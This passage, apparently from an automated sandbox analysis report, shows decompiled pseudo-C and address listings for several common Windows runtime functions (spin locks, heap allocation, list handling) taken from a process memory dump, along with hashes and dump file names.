							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04A42D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x04a5ef4b
0x04a5ef4d
0x04a5ef57
0x04a5f0bd
0x04a5f0c2
0x04a5f0d2
0x04a5f0d2
0x04a5f0c2
0x04a5ef5d
0x04a5ef5f
0x04a5ef67
0x04a5ef6a
0x04a5ef6d
0x04a5ef74
0x04a5ef7f
0x04a5ef82
0x04a5ef82
0x04a5ef86
0x04a5ef88
0x04a5ef8c
0x04a5ef8f
0x04a5ef8f
0x04a5ef8f
0x00000000
0x04a5ef91
0x04a5ef93
0x04a5efc4
0x04a5efc4
0x04a5efc4
0x04a5efca
0x04a5efd0
0x04a5f0a6
0x00000000
0x00000000
0x04a5f0af
0x04aabb06
0x04aabb0a
0x04a5f0b5
0x04a5f0b5
0x04a5f0b5
0x04a5f0b5
0x00000000
0x04a5efd6
0x04a5efd9
0x04a5f0de
0x04a5f0e2
0x04a5efdf
0x04a5efdf
0x04a5efdf
0x04a5efe5
0x04aabafc
0x04aabafc
0x04a5efe5
0x04a5efeb
0x04a5efed
0x04a5f00f
0x04a5f011
0x04a5f01a
0x04a5f01d
0x04a5f021
0x04a5f028
0x04a5f029
0x04a5f029
0x04a5f02c
0x00000000
0x04a5f02c
0x04a5eff3
0x04a5eff9
0x04a5f0ea
0x04a5f0ed
0x04a5f0ef
0x00000000
0x04a5f0ef
0x04a5f003
0x04aabb12
0x04a5f045
0x04a5f049
0x04a5f051
0x04a5f09e
0x04a5f0a0
0x04a5f0a0
0x04a5f09e
0x04a5f053
0x04a5f064
0x04a5f064
0x04a5f06b
0x04aabb1a
0x04aabb1a
0x04a5f071
0x04a5f071
0x04a5f07d
0x04a5f082
0x04a5f08f
0x04a5f08f
0x04a5f009
0x04a5f00d
0x00000000
0x04a5f00d
0x04a5efd0
0x04a5ef97
0x04a5efa5
0x04a5efaa
0x00000000
0x04a5efac
0x04a5efac
0x04a5efac
0x00000000
0x04a5efb2
0x04a5f036
0x04a5f03a
0x04a5f040
0x04a5f090
0x00000000
0x04a5f092
0x04a5f042
0x00000000
0x04a5f042
0x04a5efb7
0x04a5efb9
0x04a5efbc
0x04a5efb0
0x04a5efb0
0x00000000
0x04a5efbe
0x04a5efbe
0x04a5efc1
0x00000000
0x04a5efc1
0x04a5efbc
0x04a5efaa
0x04a5ef91

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: f0e92b8eaa0c643d8f8eb936d3f01765f31f9f8e49febacd428256fa8bd84310
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 5E511530E04245DFEB10CF68C2C07AEBBB1AF45314F1881A9EE45972A1E775BA8DD751

Uniqueness

Uniqueness Score: -1.00%

Function 04B1740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04B1740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04A9D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04A8F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04A8F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x04b1740d
0x04b1740d
0x04b17412
0x04b17413
0x04b17416
0x04b17418
0x04b1741c
0x04b1741f
0x04b17422
0x04b17422
0x04b17428
0x04b1742a
0x04b1742a
0x04b17451
0x04b17432
0x04b1744f
0x04b1744f
0x00000000
0x04b17434
0x04b17438
0x04b17443
0x04b17517
0x04b17517
0x04b1751a
0x04b17535
0x04b17520
0x04b17527
0x04b1752c
0x04b17531
0x04b17533
0x00000000
0x04b17533
0x00000000
0x04b17531
0x04b1754b
0x04b1754f
0x04b1755c
0x04b1755c
0x04b1755f
0x04b17560
0x04b17561
0x04b17562
0x04b17563
0x04b17568
0x04b1756a
0x04b1756c
0x04b1756d
0x04b1756d
0x04b1756f
0x04b17572
0x04b17574
0x04b17577
0x04b1757c
0x04b1757f
0x00000000
0x04b17551
0x04b17551
0x04b17551
0x04b17553
0x04b17553
0x04b17449
0x04b17449
0x04b1744c
0x04b1744c
0x00000000
0x04b1744c
0x04b17443
0x04b1750e
0x04b17514
0x04b17514
0x04b17455
0x04b17469
0x04b1746d
0x00000000
0x04b17473
0x04b17473
0x04b17476
0x04b17480
0x04b17484
0x04b1748e
0x04b17493
0x04b17493
0x04b17496
0x04b17499
0x04b174a1
0x04b174b1
0x04b174b5
0x00000000
0x04b174bb
0x04b174c1
0x04b174c1
0x04b174c4
0x04b174c5
0x04b174c6
0x04b174c7
0x04b174c8
0x04b174cd
0x00000000
0x04b174d3
0x04b174d3
0x04b174d6
0x04b174d8
0x04b174db
0x04b174dd
0x04b174e0
0x04b174e7
0x04b174ee
0x04b174ee
0x04b174f4
0x04b174f9
0x00000000
0x04b174fb
0x04b174fb
0x04b174fd
0x04b17500
0x04b17503
0x04b17505
0x04b17505
0x04b174f9
0x00000000
0x04b174cd
0x04b174b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 74b326d2b8d58fb9d4f5efd2b40f4c45fb1cd778649f7ac731743274d0171dfd
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: AD516B71600606EFDB15CF14C580A96BBB5FF49304F55C1AAE9099F222E771FA46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A72990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04A72990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4b1ff00);
				E04A9D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4a21664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04A8E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4a21668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04AC51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4a2166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04A72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04A56600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04A72C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04A72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04A72C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04A72ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04A9D0D1(_t62);
				goto L28;
			}

0x04a72990
0x04a72992
0x04a72997
0x04a729a3
0x04a729a6
0x04a729ab
0x04a729ad
0x04a729b2
0x04ab5c80
0x04a729b8
0x04a729b8
0x04a729bb
0x04a729c0
0x04a729c5
0x04a729c6
0x04a729c6
0x04a729cb
0x00000000
0x00000000
0x04a729cd
0x04a729d0
0x04a729d9
0x04a729db
0x04a729dd
0x04a72a7f
0x04a72a84
0x04a72a87
0x04a72a89
0x04ab5ca1
0x04ab5ca3
0x00000000
0x04a72a8f
0x04a72a8f
0x00000000
0x04a72a8f
0x00000000
0x04a729e3
0x04a729e3
0x04a729e3
0x00000000
0x04a729e3
0x04a729dd
0x00000000
0x04a729db
0x04a729e6
0x04a729e9
0x04a729eb
0x04a729ed
0x04a729f3
0x04a729f5
0x04a729f8
0x04a729fa
0x04a72a97
0x04a72a9a
0x04a72a9d
0x04a72add
0x00000000
0x04a72a9f
0x04a72aa2
0x04a72aa5
0x04a72aa8
0x04a72aab
0x04ab5cab
0x04ab5caf
0x04ab5cc5
0x04ab5cda
0x04ab5cdc
0x04ab5cdf
0x04ab5ce5
0x00000000
0x04ab5ceb
0x04ab5ced
0x04ab5cee
0x00000000
0x04ab5cee
0x04ab5cb1
0x04ab5cb4
0x04ab5cb9
0x04ab5cbb
0x00000000
0x04ab5cbd
0x04ab5cbd
0x00000000
0x04ab5cbd
0x04ab5cbb
0x04a72ab1
0x04a72ab1
0x04a72ac4
0x04a72ac6
0x04a72ac6
0x00000000
0x04a72ac6
0x04a72aab
0x00000000
0x04a72a00
0x04a72a09
0x04a72a0e
0x04a72a21
0x04a72a24
0x04a72a35
0x04a72a3a
0x04a72a3d
0x04a72a42
0x04a72a59
0x04a72a59
0x04a72a5c
0x04a72a5f
0x04a72a5f
0x04a729fa
0x04a729f3
0x04a72a64
0x04a72a64
0x04a72a6b
0x04a72a6b
0x04a72a6d
0x04a72a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df51abf85ee8e798eec522b60f7a3886dd2d9f07189a10e93f96db37374699f4
Instruction ID: 88f18574676aa98ec401c760f0305254c1f11bbd8f5a073e741c0282990df9b3
Opcode Fuzzy Hash: df51abf85ee8e798eec522b60f7a3886dd2d9f07189a10e93f96db37374699f4
Instruction Fuzzy Hash: D3514A72A00209EFEF25DF55CD40ADEBBB6BF48314F548095E815AB221D335AD92DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04A74D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04A74D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4b3d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04A8FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4b37bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04A8B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04A64620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04A4CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04A8B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04A8F380(_t67 + 0xc, 0x4a25138, 0x10) == 0) {
								 *0x4b360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04A74F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04A74E70(0x4b386b0, 0x4a75690, 0, 0) != 0) {
					_t46 = E04A4CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04a74d3b
0x04a74d4d
0x04a74d53
0x04a74d58
0x04a74d65
0x04a74d6c
0x04a74d71
0x04a74d77
0x04a74d7f
0x04a74d8c
0x04a74d8e
0x04a74dad
0x04a74db0
0x04a74db7
0x04a74db8
0x04a74db9
0x04a74dba
0x04a74dbb
0x04a74dc1
0x04a74dc8
0x04a74dcc
0x04a74dd5
0x04a74dde
0x04a74ddf
0x04a74de0
0x04a74de1
0x04a74de6
0x04a74de7
0x04a74de9
0x04a74df3
0x00000000
0x00000000
0x04ab6c7c
0x04ab6c8a
0x04ab6c8a
0x04ab6c9d
0x04ab6ca7
0x04ab6cac
0x04ab6cb2
0x04ab6cb9
0x00000000
0x04ab6cbf
0x04ab6cbf
0x00000000
0x04ab6cbf
0x04ab6cb9
0x04a74dfb
0x04ab6ccf
0x04ab6cd3
0x04a74e32
0x04a74e39
0x04ab6ce0
0x04ab6cf2
0x04ab6cf2
0x04ab6ce0
0x04a74e3f
0x04a74e41
0x04a74e51
0x04a74e51
0x04a74e03
0x04a74e03
0x04a74e09
0x04a74e0f
0x04a74e57
0x00000000
0x00000000
0x04a74e1b
0x04a74e30
0x04a74e5b
0x04a74e5b
0x00000000
0x04a74e30
0x04a74e11
0x04a74e11
0x04a74e16
0x00000000
0x04a74e16
0x04a74e01
0x00000000
0x04a74e01
0x04a74da5
0x04ab6c6b
0x00000000
0x04a74dab
0x04a74dab
0x00000000
0x04a74dab

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9200c97b08060523f19f08f39dd6e3636cdd582d20f0ff930204f90187d6a569
Instruction ID: 7f8f991be7790a74def98ce58fd81d4b4e34b3c180a452f5f595aebc9053a26b
Opcode Fuzzy Hash: 9200c97b08060523f19f08f39dd6e3636cdd582d20f0ff930204f90187d6a569
Instruction Fuzzy Hash: 4C419675A40318AFEB31DF14CE80FAAB7B9EB49724F0440AAE94597281D774FD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04A74BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04A74BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4b3d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04A4CC50(_t86);
					L11:
					return E04A8B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4b38504
				E04A62280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04A8FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04A8B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04A64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04A4CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4b38504
								E04A5FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04A74F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04a74bad
0x04a74bbf
0x04a74bc2
0x04a74bc6
0x04a74bcd
0x04a74bd9
0x04ab67fe
0x04ab6800
0x04a74ccc
0x04a74ccd
0x04a74cb7
0x04a74cc9
0x04a74cc9
0x04a74bdf
0x04a74be5
0x00000000
0x00000000
0x04a74beb
0x04a74bef
0x00000000
0x00000000
0x04a74bf5
0x04a74bf9
0x04a74c06
0x04a74c0b
0x04a74c17
0x04a74c1c
0x04a74c1f
0x04a74c25
0x04a74c33
0x04a74c3d
0x04a74c40
0x04a74c43
0x04a74c47
0x04a74c4d
0x04a74c53
0x04a74c54
0x04a74c55
0x04a74c56
0x04a74c5b
0x04a74c5c
0x04a74c63
0x04a74c6b
0x00000000
0x00000000
0x04ab6776
0x04ab6784
0x04ab6784
0x04ab679f
0x04ab67a7
0x04ab67af
0x04ab67ce
0x00000000
0x04ab67b1
0x04ab67b7
0x04ab67b8
0x04ab67c1
0x04ab67d3
0x04ab67d9
0x04ab67dd
0x04a74c94
0x04a74c94
0x04a74c98
0x04a74c9c
0x04a74ca3
0x04ab67f4
0x04ab67f4
0x04a74cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04a74cb5
0x04a74c79
0x04a74c7e
0x04a74c89
0x04a74c8b
0x04a74c8f
0x04a74c8f
